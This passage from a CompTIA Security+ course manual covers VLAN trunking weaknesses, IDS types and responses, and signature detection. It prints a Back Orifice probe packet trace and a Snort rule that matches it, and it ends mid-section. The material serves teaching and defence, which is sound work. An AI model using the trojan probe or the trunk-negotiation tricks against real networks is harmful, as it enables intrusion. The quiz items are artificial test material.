                    also connected to VLAN 20. Without trunking, a separate physical connection for each
                    VLAN would have to be established between each switch and switch E. The switch’s
                    built-in intelligence watches packets arriving on a trunk port, automatically determines
                    to which VLAN it belongs, and forwards it to the appropriate port. The result is that the
                    network administrator can place any host in the building on any of his or her network’s
                    subnets, on the fly, without any physical recabling.
                    Major trunking protocols include IEEE 802.1q and Cisco’s proprietary Inter-Switch
                    Link (ISL).
                                                   Network security topologies   11–25




Exhibit 11-5: Assigning ports to different VLANs
11–26 CompTIA Security+ Certification

                    Security features of VLANs
                    VLANs have a number of security features, many of which are derived from the fact
                    they permit the administrator to divide a single physical device into multiple subnets,
                    which is to say that VLANs allow networks to be segmented, dividing up hosts and their
                    traffic.
                    VLANs can be configured to group together users in the same group or team, regardless
                    of where their computers are physically connected to the network. The users can be
                    spread throughout a building or across a campus network. Any criteria can be used to
                    divide users up, depending on business requirements. For example, accountants working
                    with sensitive financial data might be segmented on a separate VLAN from other users
                    in order to ensure that the accounting information stays confidential. Because they are
                    on different subnets, hosts in the Accounting Department VLAN cannot communicate
                    directly with other hosts, they can only do so with the help of a router. This protects the
                    Accounting Department from many attacks that rely on direct communication between
                    hosts, such as man-in-the-middle, because accounting’s broadcasts cannot be seen by
                    other departments’ users. Further, because traffic filtering can be configured on the
                    router connecting VLANs to the corporate network, the network administrator is able to
                    enforce security policies by stopping prohibited communications between department
                    VLANs.
                    Another useful aspect of VLANs pertains to physically inserting attacking devices, such
                    as a sniffer, into the network. If an unauthorized person gains access to the network
                    closet and attempts to connect a sniffer to the network, VLANs could offer some
                    protection. In this situation, the attacker wouldn’t know in advance to which VLAN he
                    was connecting (unless he had previous knowledge of the network) because any port
                    could be configured to be in any VLAN. Depending on the attacker’s objectives (such
                    as sniffing traffic belonging to the Accounting Department), this could foil the attack.
                    Further, adhering to the best practices outlined here increases the difficulty of
                    connecting rogue devices to the network.
                    Protect unused switch ports. Most configurable switches support the ability to turn off
                    ports. Network administrators should be sure to turn off all switch ports that are not in
                    use so that they cannot be used by an attacker to connect an unauthorized device to the
                    network. Administrators can protect their networks from accidentally leaving an unused
                    port on by moving all unused ports to a separate VLAN without any user traffic and
                    without any router connections. That way, if an attacker does find an active port to use,
                    there is no traffic to sniff and no router to permit him to reach other network segments.
                    Use an air gap to separate trusted from untrusted networks. Do not allow the same
                    switch or network of switches to provide connectivity to networks segregated by
                    security devices such as firewalls. A switch that has direct connections to untrusted
                    networks such as the Internet, or semi-trusted networks such as DMZs, should never be
                    used to contain trusted network segments as well. Several attacks can affect the
                    configuration of the switch so that it does not properly segment VLANs.

                    Vulnerabilities of VLAN trunks
                    A number of vulnerabilities are associated with VLAN trunks. This is inherent in their
                    function of carrying traffic from multiple subnets across a single physical connection.
                    One could imagine that if it is desirable to prevent hosts in two different departments
                    (say, Accounting and Marketing) from communicating with each other, that there might
                    be issues with mixing their traffic over a trunk.
                                                      Network security topologies   11–27

Trunk auto-negotiation
One way that trunks can be abused stems from the fact that the default behavior of some
manufacturer’s switches is to automatically negotiate a trunk connection if the
connecting device initiates it.
Hackers can exploit this behavior by compromising a host on the network and then
causing that host to negotiate a trunk connection with the switch. Once the trunk
connection has been established, the switch forwards traffic for all VLANs across the
link, giving the attacker access to potentially the entire network. Recall our example in
which the Accounting and Marketing Departments are placed on separate VLANs and
are connected with a router that filters traffic between the two. The attacker could use a
host in the Marketing Department to create a trunk with the switch. As the switch begins
to forward traffic down the illicit trunk link, the attacker can view and possibly modify
traffic from Marketing, Accounting, or any other department using the switch. The
protection provided by packet filtering on the router has been completely avoided
because the trunk traffic does not pass through the router.
Prevent illicit trunk connections by disabling auto-negotiation on all ports. Ports that are
to carry trunks should be configured as trunks. All other ports should be configured not
to be trunks.

Trunk VLAN membership and pruning
By default, trunk links are permitted to carry traffic from all VLANs on the network.
This can lead to performance degradation of switches from carrying large amounts of
traffic across trunks. In some cases, this traffic might not even be needed, as would be
the case if a switch received traffic for the Accounting VLAN over a trunk but did not
have any ports configured for that VLAN. This situation can be relieved by pruning
(that is, removing) unneeded VLANs from the trunk. By removing the Accounting
VLAN from the trunk, more bandwidth is made available to users connected to the
switch. Some switches simplify this process by automatically pruning VLANs from a
trunk if there are not any VLAN member ports on the other side of the trunk link.
Relying on this default behavior to ensure that sensitive information is not carried to
undesired areas of the network can be dangerous, however. For example, take a switch
in a company’s mechanic shop that is only used for the shop employees and has a trunk
connection back to the office network. By default, only traffic destined for the auto shop
is forwarded across the trunk, because there are no ports on the shop’s switch that are
configured for other VLANs. However, the Accounting Department’s information is
still at risk. If an attacker could configure a port on the shop’s switch to be in the
Accounting VLAN, then the Accounting VLAN would no longer be pruned from the
trunk, and Accounting traffic would automatically be forwarded across the trunk to the
mechanic shop. An attacker could take advantage of a poorly monitored area to
physically compromise the network.
In order to prevent such attacks, it is recommended that all trunk links be manually
configured with the VLANs that are permitted to traverse them. Manual trunk pruning
cannot be overridden the same way that automatic pruning is preempted.
For more information on VLANs, go to:
    http://www.cisco.com/univercd/cc/td/doc/cisintwk/ito_doc/lansw
    tch.htm.
11–28 CompTIA Security+ Certification

Do it!              D-1:    Discussing VLANs and trunking
                     Questions and answers
                      1 Major trunking protocols include which of the following? (Choose all that apply.)
                        A      IEEE 802.1q
                        B      IEEE 802.3
                        C      Cisco’s proprietary Inter-Switch Link (ISL)
                        D      IEEE 802.10

                      2 VLANs are often coupled with a complimentary technology, called _________,
                        which allows switches to share many VLANs over a single physical link.
                        A      spanning tree
                        B      network address translation
                        C      trunking
                        D      pruning

                      3 When referring to VLANs, pruning refers to removing unneeded VLANs from the
                        trunk. True or false?

                        True

                      4 VLANs are used throughout networks to segment, or separate, different hosts
                        from each other on the network. True or false?

                        True
                                                               Network security topologies   11–29


Unit summary: Network security topologies
Topic A   In this topic, you learned that security zones offer another dimension of network
          security. You learned about how the DMZ, intranet, and extranet fits within this
          model. You also considered how the security policy should be developed to include
          these security zones.
Topic B   In this topic, you examined the Network Address Translation (NAT) and Port
          Address Translation (PAT) technologies and their role in safeguarding the network.
          You learned how to configure a router with NAT and to filter Internet traffic for IP
          addresses and ports.
Topic C   In this topic, you learned how tunneling can be used to securely connect networks over
          public infrastructures.
Topic D   In this topic, you learned that Virtual LANs (VLANs) are used to divide a physical
          network into multiple network segments. This isolates sensitive traffic, as in the case of
          Accounting or Human Resources, from the rest of the corporate network. It also reduces
          the range of access should a hacker infiltrate the network.

          Review questions
           1 Which security zone should contain your Web, FTP, and mail servers?
              A Intranet
              B   DMZ
              C Extranet
              D VPN
           2 Which security zone describes a configuration where the internal network of one
             company is available to another for B2B transactions?
              Extranet

           3 Which network service(s) allows internal addresses to be hidden from outside
             networks?
              A   NAT

              B   DMZ

              C VLAN
              D VPN
           4 PAT allows many hosts to share a single IP address by combining the IP address
             with a unique ________________.
              TCP/UDP port number
11–30 CompTIA Security+ Certification

                     5 Which networking technology enables a host to securely send its data through an
                       untrusted or public network infrastructure?
                       A Pruning
                       B   Tunneling

                       C Extranet
                       D Perimeter network
                     6 Which of the following ports are necessary for allowing DNS traffic?
                       A   TCP 53

                       B TCP 80
                       C   UDP 53
                       D UDP 80
                     7 What are the benefits of a VLAN?
                       A It hides the internal IP address from external networks.
                       B   It segments traffic on the internal network for increased security.
                       C It provides a secure tunnel from between two extranets.
                       D It filters incoming traffic for selected IP and port addresses.
                     8 What are vulnerabilities of the VLAN?
                       A   A compromised host can negotiate a trunk connection with the switch, giving the
                           attacker access to the entire network.
                       B A host’s broadcasts can be seen by other network segments.
                       C A sniffer can be physically inserted into a specific targeted network segment.
                       D   Automatic pruning permits an attacker to reconfigure a switch’s port to forward
                           traffic to a different segment.
                                                                12–1


Unit 12
Intrusion detection
                      Unit time: 120 minutes

                      Complete this unit, and you’ll know how to:

                      A Explain intrusion detection systems and
                         identify some of the major characteristics
                         of intrusion detection products.

                      B Detail the differences between host-based
                         and network-based intrusion detection.

                      C Identify active detection and passive
                         detection features of both host- and
                         network-based IDS products.

                      D Explain honeypots and how they are
                         employed to increase network security.

                      E Outline the proper response to an attack.
12–2      CompTIA Security+ Certification


Topic A: Intrusion detection systems
Explanation          Much like closed-circuit television systems employed in workplaces to monitor and
                     increase security, intrusion detection systems (IDS) are monitoring devices on the
                     network that help security administrators to identify attacks in progress, stop them, and
                     to conduct forensic analysis after the attack is over.
                     Intrusion detection is an important part of a commonly used security strategy known as
                     defense in depth. Defense in depth is a multi-layered security approach that uses
                     multiple techniques such as preventative technologies, security monitoring, and attack
                     response to provide a robust security architecture.
                     Intrusion detection provides monitoring of network resources to detect intrusions and
                     attacks that were not stopped by the preventative techniques. For many reasons, it is
                     impossible for firewalls to prevent all attacks. Some attacks occur from inside the
                     network, and as such do not need to pass through the firewall to reach their victim hosts.
                     Other attacks can occur from the outside, but use traffic permitted by the firewall.
                     Intrusion detection systems are complimentary to blocking devices because they can
                     monitor the attack after it crosses through the firewall, either as it passes across the
                     wire, or as it is seen by the victim host.
                     Similar to virus scanners, intrusion detection systems compare traffic to signature files
                     that recognize specific known types of attack. These files are usually provided by the
                     hardware or software vendor and are updated on a subscription basis. Additionally,
                     intrusion detection systems can detect anomalies. Any pattern of traffic that deviates
                     from the expected sequence of packets during a session might be suspect and cause a
                     network manager to be notified. By employing this technique, even attacks that are too
                     new to appear in the signature file might be flagged for manual analysis by an
                     administrator who might be able to stop an attack or mitigate its effect.
                     Intrusion detection tools also assist in protecting organizations by expanding the options
                     available to manage the risk from threats and vulnerabilities. Since the modus operandi
                     of intrusion detection systems is to monitor activity, either on the network segment or
                     on the host, they gather useful information that can not only be used to detect an
                     attacker, but also to identify and stop him, support investigations to understand the
                     attacker’s strategy, and to prevent the strategy from being successful in the future.
                     Intrusion detection systems are a very powerful tool in a security administrator’s tool
                     kit.

                     Negatives and positives
                     One of the most important goals of IDS is that they must correctly identify intrusions
                     and attacks. False positives and false negatives refer to situations in which the intrusion
                     detection systems do not correctly categorize activities as being attacks or as being
                     benign. There are really only two possible decisions for each activity that IDS observe:
                     the activity can be identified as an attack, or just the opposite, it can be identified as
                     benign.
                                                               Intrusion detection   12–3

Because the IDS can be either correct or incorrect in their determination about the type
of activity, there are four possibilities to describe the correctness of IDS determinations:
    • True positives — Occur when the IDS correctly identifies undesirable traffic.
    • True negatives — Occur when the IDS correctly identifies normal traffic.
    • False positives — Occur when the IDS incorrectly identifies normal traffic as an
      attack.
    • False negatives — Occur when the IDS incorrectly identifies an attack as normal
      traffic.

False negatives
False negatives imply that the IDS failed to detect an attack, a very undesirable
situation. False negatives typically occur when the pattern of traffic is not identified in
the signature database, such as with a new attack. False negatives can also occur with
network-based IDS when the sensor is not able to analyze passing traffic fast enough.
For example, if a network-based IDS (NIDS) capable of processing 40 Mb/sec worth of
traffic is placed on a 100 Mb/sec network segment, the NIDS will begin to miss packets
when the volume of traffic on the segment surpasses its 40 Mb/sec capability. IDS is not
infallible, and false negatives do indeed occur on a regular basis.
The problem of false negatives can be dealt with in two ways. First, a combination of
network-based and host-based IDS can be used to obtain more even coverage. The
combination also helps to gather more data on attacks that can help administrators
analyze the attack more effectively. Second, NIDS can be deployed at multiple strategic
locations in the network. That way, an attack missed by one NIDS, on the server farm’s
network segment, for example, might be caught by the NIDS just inside the firewall.

False positives
False positives happen when the IDS mistakenly reports certain benign activity as
malicious. Best-case false positives require human intervention to diagnose the event.
Worst-case false positives can cause the legitimate traffic to be blocked by a router or
firewall.
Obviously, false positives are undesirable because they require the time of a security
administrator—an expensive commodity—to analyze and sort out the problem. All IDS
products on the market today are subject to false positives. Especially just after
deployment, IDS can be expected to produce a relatively high volume of false positives,
which are reduced over time using a process called tuning.
The tuning process allows the administrator to instruct sensors not to alarm, based on
parameters such as signature type, and source or destination IP address. One common
example is a network management program that pings devices to ensure that they are
functioning. This behavior resembles a reconnaissance technique called a ping sweep,
which attackers can use to determine which IP addresses are up and available to attack.
It also triggers an alarm from an NIDS. Although ping sweeps can indicate malicious
activity, the alarm is a false positive when the ping sweep is conducted by an authorized
host, the network management system. To prevent the NIDS sensor from alarming on a
false positive, it can be configured not to alarm on ping sweeps from the network
management system’s IP address. Tuning is an essential step in any IDS deployment.
12–4     CompTIA Security+ Certification

Do it!              A-1:      Detecting intrusion
                      Questions and answers
                       1 What is defense in depth?

                          This is a multilayered security approach that uses multiple security techniques such as
                          preventative technologies, security monitoring, and attack response.

                       2 Intrusion detection provides monitoring of network resources to detect intrusions
                         and attacks that were not stopped by the preventative techniques. True or false?

                          True

                       3 Intrusion detection systems identify attacks by comparing traffic to signature files
                         with known types of attack and detecting anomalies. True or false?

                          True

                       4 False negatives happen when the IDS mistakenly reports certain benign activity as
                         malicious. True or false?

                          False. These are false positives.

                       5 What measures can you take to reduce false negatives?
                          A      Combine network-based and host-based IDS.
                          B      Tune the IDS to accept specific signature types or source or destination IP
                                 addresses.
                          C      Deploy NIDS at multiple strategic locations in the network.
                          D      Reduce the traffic speed.
                                                                                        Intrusion detection       12–5


Topic B: Network-based and host-based IDS
              This topic covers the following CompTIA Security+ exam objective:

               #     Objective

               3.4   Differentiate the following types of intrusion detection, be able to explain the concepts of each
                     type, and understand the implementation and configuration of each kind of intrusion detection
                     system
                      • Network Based
                      • Host Based




              Types of IDS
Explanation   The two types of intrusion detection systems on the market today are host-based and
              network-based. The essential difference between them is the scope of activity that they
              monitor and analyze to detect intrusions. Network-based IDS (NIDS) monitor network
              traffic while host-based IDS (HIDS) monitor activity on a particular host machine.

              Network-based IDS
              NIDS sensors are dedicated network devices or servers that monitor traffic on one or
              more network segments. The sensors usually have two network connections, one that
              operates in promiscuous mode to sniff passing traffic, and an administrative NIC that is
              used to send data such as alerts to a centralized management system. The configuration
              is shown in Exhibit 12-1.




              Exhibit 12-1: NIDS monitoring and management interfaces

              Because NIDS analyze all passing traffic, they can be used to protect an entire network
              segment—or the entire organization—depending on their placement within the network.
              The primary constraint for NIDS is the occasional inability to keep up with the pace of
              network traffic.
12–6   CompTIA Security+ Certification

                  NIDS architecture
                  One of the key questions that arise in deploying NIDS is, where in the network do
                  sensors belong? Because it is not cost-effective or even manageable to deploy sensors
                  on all network segments, careful consideration needs to be given as to where they are
                  deployed.
                  To determine how to deploy IDS, one needs only answer the question: What do I most
                  need to protect? The decision of where to deploy IDS should be driven by the value
                  your organization places on its information assets. This is because NIDS sensors are
                  placed strategically in the network to defend assets that are considered the most
                  valuable where they will offer the most protection. Typical locations for IDS sensors
                  include:
                      • Just inside the firewall
                      • On the DMZ
                      • On any subnets containing mission-critical servers
                  Just inside the firewall is a common location for IDS because it is the bottleneck
                  through which all inbound and outbound traffic must pass. In this location, sensors are
                  able to inspect every packet coming into or out of the organization’s network, provided
                  there are no other avenues such as dial-up connections or extranet connections that the
                  attacker can use.
                  The DMZ is another good location for IDS, because the publicly reachable hosts located
                  there are frequently attacked from the Internet. If a good security policy is implemented
                  (which likely disallows connectivity from the Internet directly to the inside network),
                  then the DMZ is the attacker’s first point of entry into the network. Once a DMZ host
                  has been compromised, the attacker attempts to penetrate the trusted network. IDS in
                  this location can help to identify and stop intruders before they are able to do so.
                  Finally, consider placing the sensor on any subnets containing mission-critical
                  application servers, such as those performing financial, logistical, and human resources
                  functions. By placing the sensor on these segments, the organization can defend its
                  servers from attacks originating from inside the network.

                  NIDS signature types
                  Signature-based IDS look for patterns in packet payloads that indicate a possible attack.
                  When the sensor finds a packet payload that matches the string pattern in its sensor, it
                  identifies the packet as an attack and alerts the administrator.
                  An IDS based on another signature type, port signature, simply watches for connection
                  attempts to a known or frequently attacked port. These could be ports used by Trojan
                  horse programs, or other malware, or they could simply be well-known ports in a packet
                  destined for part of the network where the corresponding service should not exist. For
                  example, if telnet (TCP port 23) is not used on the DMZ, then a telnet packet destined
                  for the DMZ could be marked as suspicious.
                  Finally, IDS based on header signatures watch for dangerous or illogical combinations
                  in packet headers. One well-known example is a packet generated by the attack tool
                  WinNuke. WinNuke creates packets destined for a NetBIOS port, with the Urgent
                  pointer, or Out Of Band pointer set. This packet crashes older Windows systems. A
                  NIDS based on header signatures identifies this type of packet as an attack, because the
                  attack is contained in the packet’s header and not in the payload.
                                                              Intrusion detection   12–7

Because new vulnerabilities are constantly identified by the security community,
signature-based intrusion detection systems must be kept up to date with the latest
signatures, much the same way virus definitions in virus scanning software need to be
kept current with the latest developments in the security arena. The time between when
the new attack first becomes available and when it becomes known to the security
community (which then produces a signature for the attack) represents a vulnerability of
signature-based IDS, because attackers are free to use the new exploit without fear of
detection during that time period. IDS vendors do commonly provide signature update
services, and e-mail customers when new signatures become available. To minimize
vulnerability, it is critical that IDS be loaded with the latest signatures.

Network IDS reactions
As has been previously noted, network-based IDS with active monitoring capabilities
are able to react when they detect an attack in progress. Typical reaction types include:
    • TCP resets
    • IP session logging
    • Shunning or blocking
Most active capabilities are configurable on a per-signature basis, meaning that the
sensor can perform IP session logging for some attacks, blocking for others, or simply
sound the alarm, depending on the organization’s requirements.
Note: Extreme care should be used with active sensor capabilities to prevent
interference with legitimate traffic. In practice, active capabilities are infrequently
implemented because of the risk that they could be used to deny service of legitimate
user traffic. When these capabilities are deployed, it is done after the sensors have been
carefully tuned and requires ongoing monitoring.

TCP resets
TCP resets operate by sending a TCP reset packet (which terminates TCP sessions) to
the victim host, spoofing the IP addresses of the attacker. Resets are sent from the
sensor’s monitoring or sniffing interface.
Although TCP resets can terminate an attack in progress, they cannot stop the initial
packet from reaching the victim. In some cases, a single packet is all that is required to
crash or compromise the victim host. Further, in order to successfully spoof the identity
of the attacking host (remember that the victim does not know that it is under attack and
sees the TCP session as being like any other session that should be protected from
session hijacking), the sensor must guess the correct TCP session number so that the
victim will accept the reset and end the session.

IP session logging
With IP session logging, the sensor records traffic passing between the attacker and the
victim. (Note that these records can be very useful for analyzing the attack and
preventing it in the future.) The limitation of logging is that only the trigger and the
subsequent packets are logged, so any preceding packets are lost. IP session logging can
also impact sensor performance and quickly consume large amounts of disk space.
12–8     CompTIA Security+ Certification

                    Shunning
                    In shunning (also known as IDS blocking), the sensor connects to the firewall or a
                    packet-filtering router from its management interface and configures filtering rules that
                    block packets from the attacker. Proper authentication needs to be arranged to ensure
                    that the sensor can securely log into the firewall or router.
                    Shunning is usually a temporary measure (the rules are typically left in for a period of
                    minutes or hours) that buy administrators time to respond. Shunning is not typically a
                    permanent countermeasure. It is important to keep in mind that if the attacker has used a
                    spoofed source address in his attack, then the IDS sensor will actually block someone
                    other than the attacker (the legitimate owner of the spoofed IP address).
                    Note: Shunning takes place after a triggering packet has been noted by the sensor.
                    When it reaches the victim host, it can potentially inflict damage before the filtering rule
                    is in place.

Do it!              B-1:      Discussing network-based IDS
                      Questions and answers
                       1 Network-based IDS (NIDS) monitor traffic on a host machine. True or false?

                          False. NIDS monitor traffic on the network.

                       2 TCP resets operate by spoofing the IP addresses of the attacker and sending a TCP
                         reset packet to the victim host. True or false?

                          True

                       3 With IP session logging, the sensor records traffic passing between the attacker
                         and the victim. True or false?

                          True

                       4 The DMZ is a good location for IDS because the publicly reachable hosts located
                         there will be under constant attack from the Internet. True or false?

                          True

                       5 In shunning, the sensor connects to the firewall or a packet-filtering router from
                         what interface?
                          A      Management
                          B      IDS sensor
                          C      Desktop
                          D      Host sensor

                       6 A NIDS that watches for connection attempts to a known or frequently attacked
                         port uses _____________ detection.

                          port signature
                                                                              Intrusion detection   12–9

              Host-based IDS
Explanation   Host-based IDS are used to protect a critical network server containing sensitive
              information. Host-based IDS agents (the actual HIDS software) only protect the host on
              which they are installed. Like any application, host-based IDS agents use resources on
              the host server (disk space, memory, and processor time), which can have some impact
              on system performance. HIDS can detect intrusions by analyzing the logs of operating
              systems and applications, resource utilization, and other system activity. Host-based
              IDS are primarily used to protect only critical servers, because it is not practical or cost-
              effective to install them on all systems.

              HIDS method of operation
              Host-based intrusion detection products have a wealth of methods that can be employed
              to detect and stop intrusions. A list of the more common techniques employed by
              modern HIDS products includes:
                  • Auditing of logs, including system logs, event logs, security logs, and syslog (for
                    Unix hosts).
                  • Monitoring of file checksums to identify changes.
                  • Elementary network-based signature techniques including port activity.
                  • Intercepting and evaluating requests by applications for system resources before
                    they are processed.
                  • Monitoring of system processes for suspicious activity.

              Log files
              Most HIDS products audit log files by monitoring changes to them. If a log file is
              changed, the HIDS product checks the new entry to see if it matches any of the HIDS
              attack signature patterns. If the log entry does match the attack signature, the HIDS alert
              administrators. Note that because logs reflect past events, file auditing cannot stop the
              action that sets off the alarm from taking place.

              File checksums
              File checksums are similar to log file audits in that they can detect past activity. Hashes
              are typically created only for critical system files that should change infrequently if at
              all. If frequently changing files are included in the file audit, the administrator will need
              to tune the IDS so that it does not generate alerts every time these files are changed. The
              tuning process can be used by administrators to learn which files they should expect to
              change and which should remain static.
              File checksum systems such as Tripwire can also be employed when full-fledged HIDS
              products are not available or practical for a particular environment. (Tripwire scans file
              systems and creates hashes of critical system files. The hashes are saved, and the
              program is periodically rerun to validate that the hash value for each file has not
              changed.) By employing such a product, administrators can be notified when an
              intrusion has occurred (because the attacker will almost certainly upload tools or change
              permissions to make access to the machine easier), and can be certain which files have
              been tampered with by the intruder. The modified files can be easily identified and
              refreshed from backups, eliminating the need to completely rebuild the server.
12–10 CompTIA Security+ Certification

                    Network-based techniques
                    Network-based techniques can also be added to host-based intrusion detection software
                    products. In this situation, the IDS product simply monitors the packets entering and
                    departing the host’s NIC for signs of malicious activity. This solution is designed only
                    to protect the host in question, not to act as a full-featured NIDS product that can protect
                    the entire network segment. Rather than sniff all network traffic, the IDS product simply
                    intercepts received packets before they are passed to the host’s operating system.
                    HIDS products that incorporate NIDS functionality rarely have the same sophisticated
                    attack signatures that dedicated NIDS products have. Most often, HIDS products only
                    provide rudimentary network-based protections.

                    Intercepting requests and monitoring the system
                    Perhaps most significantly, modern HIDS products proactively protect the monitored
                    host by intercepting requests to the operating system for system resources before they
                    are processed. This type of HIDS product integrates with the operating system and is
                    able to validate software calls made into the OS and kernel. Validation of the software
                    calls is accomplished by both generic rules about what processes might have access to
                    resources, and by matching calls to system resources with predefined models
                    (signatures) which identify malicious activity.
                    This feature has far-reaching implications for the security of the protected host. By
                    intercepting calls to the OS before they are processed, HIDS can use active monitoring
                    techniques to preempt attacks before they are executed. Because the operating system
                    controls all system resources, this type of NIDS can:
                        • Prevent files from being modified, deleted, and in some cases being viewed.
                        • Allow access to data files only to a predefined set of processes.
                        • Protect system registry settings from modification.
                        • Prevent critical system services (such as a Web server) from being stopped,
                          modified, or deleted.
                        • Protect settings for users from being modified or deleted, including preventing
                          escalation of the rights.
                        • Stop exploitation of application vulnerabilities that might allow remote access to
                          the system or deny access (DoS) to the system.
                        • Prevent the protected server’s application from making unauthorized changes to
                          the system.
                                                             Intrusion detection   12–11

HIDS software
Host-based IDS are deployed by installing agent software on the system to be protected.
There are two main types of host-based intrusion detection software: host wrappers
(some of which are thought of as desktop or personal firewalls) and agent-based
software. Either approach is much more effective in detecting trusted-insider attacks
(so-called anomalous activity) than is network-based ID, and both are relatively
effective for detecting attacks from the outside. However, host wrappers do not have the
ability to provide the in-depth, active monitoring measures that agent-based HIDS
products have. Host wrappers tend to be inexpensive and deployable on all machines in
the enterprise, while agent-based applications are more suited for single purpose servers.
Examples of host wrappers are Internet Security Systems’ (formerly Network ICE and
then Black ICE Defender ) BlackICE PC Protection and BlackICE Server Protection
(www.iss.net).
An example of a full-fledged agent HIDS product is McAfee’s Entercept host-based
IDS product (mcafee.com/us/products/mcafee/host_ips/category.htm).
These products have evaluation versions that can be downloaded and used on a trial
basis.

HIDS active monitoring capabilities
When an attack is flagged, host-based IDS have a similar menu of options to that of
network-based IDS. However, given that the HIDS have access to the host’s operating
system, the HIDS have more power to end attacks with more certainty. List of options
commonly used by HIDS agents include:
    • Log the event
    • Alert the administrator
    • Terminate the user login
    • Disable the user account
Logs of an offending event that trigger a response from an agent are obviously a useful
thing for administrators to review in performing a post mortem on an attack.
Administrators can be alerted through an IDS management console (an application
responsible for receiving alarms from IDS agents), by sending an e-mail, or by sending
SNMP traps to a network management system.
The ability for host-based intrusion detection systems to stop attacks in progress by
forcing the offending account to log off or disabling it altogether is what makes host-
based IDS an effective security tool and one that compliments network-based IDS and
firewalls. Those HIDS products with a high degree of OS integration and which can
intercept requests for system resources can go a step further by preventing access to
memory, processor time, and disk space altogether.
12–12 CompTIA Security+ Certification

                    Advantages of host-based IDS
                    Host-based and network-based IDS products are complimentary solutions that should be
                    deployed together to provide defense in depth for network assets. Network-based
                    solutions generally provide an early warning system for attacks, often identifying
                    attacker reconnaissance activities. Host-based intrusion detection solutions have the
                    ability to actually stop compromises while they are in progress. Some of the benefits of
                    HIDS include:
                        • Host-based systems have the ability to verify success or failure of an attack by
                          reviewing extensive HIDS log entries. Network-based IDS products can verify
                          that an attack was attempted, but cannot always provide evidence as to whether
                          or not the attack was successful.
                        • Host-based solutions monitor user and system activities such as file access,
                          changes to permissions and user accounts, software installation, and use of
                          networked resources. This provides detailed information that can be used in a
                          forensic analysis of the attack.
                        • Host-based solutions have the ability to protect against attacks that are not
                          network based, such as when an attacker attempts to gain direct physical access
                          to the host from the keyboard.
                        • Host-based IDS solutions do not rely on any particular network infrastructure,
                          and so are not limited by switched infrastructures, which can make network-
                          based IDS implementations difficult.
                        • Host-based IDS solutions are able to react very quickly to intrusions, by either
                          preventing access to system resources or by identifying a breach immediately
                          after it has occurred.
                        • Because host-based IDS agents are installed on the protected server itself, it
                          requires no additional hardware to deploy, and does not require any changes to
                          the network infrastructure.
                                                                           Intrusion detection   12–13

Do it!   B-2:   Discussing host-based IDS
          Questions and answers
          1 What types of activity do host-based IDS (or HIDS) monitor?

            HIDS monitor log files, file checksums, port activity, application requests, and system
            processes for suspicious activity.

          2 In protecting applications, the host sensor agent monitors which areas of
            application activity? (Choose all that apply.)
            A      Program files
            B      Data file
            C      Registry settings
            D      Services
            E      Users
            F      All of the above

          3 HIDS can stop an attack in progress by forcing the offending account to log off or
            disabling it altogether. True or false?

            True

          4 Some benefits of HIDS include:
            A      Can verify success or failure of an attack by reviewing log entries.
            B      Monitor user and system activities.
            C      Protect against attacks that are not network based, such as physical attacks.
            D      Are not limited by switched infrastructures.
            E      React quickly to intrusions.
            F      All of the above.
12–14 CompTIA Security+ Certification


Topic C: Active and passive detection
                    This topic covers the following CompTIA Security+ exam objective:

                     #     Objective

                     3.4   Differentiate the following types of intrusion detection, be able to explain the concepts of each
                           type, and understand the implementation and configuration of each kind of intrusion detection
                           system
                            • Network Based
                                • Active Detection
                                • Passive Detection
                            • Host Based
                                • Active Detection
                                • Passive Detection




                    Types of intrusion detection systems
Explanation         One way that intrusion detection systems can be categorized is based on their ability to
                    take action when they detect suspicious activity.
                    Passive systems log security events, alert administrators when an attack occurs, and
                    record the offending traffic for analysis, but do not take any preventive action to stop the
                    attack. Active systems have all the logging, alerting, and recording features of passive
                    IDS, with the additional ability to take action against the offending traffic.
                    A couple of options are available for an active system. Active IDS that are able to
                    interoperate with routers and firewalls can upload access control lists to them in order to
                    block the offending traffic at the network edge, as shown in Exhibit 12-2.




                    Exhibit 12-2: NIDS reconfiguration of a router to block attacking packets
                                                               Intrusion detection   12–15

This feature is often referred to as IDS shunning or blocking. Another option is for the
active IDS system to send a TCP reset, using the spoofed IP address of the attacker, to
the victim host, causing the attacking session to be killed. The TCP reset is illustrated in
Exhibit 12-3.
Although active systems might seem far superior because of their ability to block
undesirable traffic, those features must be used with extreme care. Because IDS has not
matured to a point where false positives are very low, enabling shunning features on
IDS can cause legitimate traffic to be inadvertently blocked. Worse, attackers can use
the IDS to create denial-of-service attacks where legitimate users’ IP addresses or
subnets are blocked from entering the network. Active IDS features tend to be used only
in networks where the IDS administrator has carefully tuned the sensor’s behavior to
minimize the number of false positive alarms.




Exhibit 12-3: TCP resets used to stop attacking sessions


Anomaly-based and signature-based IDS
A system has been developed to classify intrusion detection systems based on how they
detect malicious activity. There are two major categories: signature detection (also
known as misuse detection), and anomaly detection.

Signature detections
Signature detection is achieved by creating models of attacks, also called signatures. As
events are monitored, they are compared to a model to determine whether the event
qualifies as an intrusion. For example, most NIDS use signatures to identify attacks. The
signature of a given attack could be a string of characters that appear in the payload of a
packet that is part of the attack.
If you used a protocol analyzer such as SnifferPro to view a Back Orifice port probe
(which an attacker might execute to determine if Back Orifice is running on a potential
victim host), you would see the following data in the packet’s payload:
    CE 63 D1 D2 16 E7 13 CF 38 A5 A5 86 B2 75 4B 99
    c......8....uK.
    AA 32 58                                                              .2X
12–16 CompTIA Security+ Certification

                    Now that you know what the probe looks like, a signature can be created for a NIDS.
                    The following signature definition was created from the above sniffer trace for use with
                    an open source IDS program called Snort:
                        alert UDP $EXTERNAL any -> $INTERNAL 31337 (msg: “IDS397/
                        trojan_trojan-BackOrifice1-scan”; content: “|
                        ce63 d1d2 16e7 13cf 38a5 a586|”;)
                    The relevant part of the signature definition, the content field, appears in bold type.
                    Notice that it matches the sniffer trace. Snort examines every packet that enters its
                    monitoring NIC and compares the data payload against this signature. If there is an
                    exact match, then Snort alerts the administrator that it has identified an attack using a
                    Back Orifice port scanner. It is important that only attacks and no benign traffic should
                    match the signatures, otherwise false alarms are generated.
                    The signature detection method is good at detecting known attacks, but requires the
                    sensor’s database be maintained with current signatures; otherwise, new attacks are not
                    detected. A well-crafted signature nearly always detects the attack it represents, but
                    other packets might also match the signature and generate false alarms. When false
                    positives occur, IDS administrators tune the sensor by carefully determining the cause
                    of the alarm. If the alarm is irrelevant (as it would be if it represented a Windows
                    exploit when the network has only Unix hosts), then the administrator can safely
                    configure the sensor to ignore the signature. If the alarm is required, then the alarm’s
                    context would be modified to prevent a repeat occurrence. Most signature systems are
                    easily customizable, and knowledgeable users can create their own signatures.
                    One problem with signature-based detection techniques is the large number of
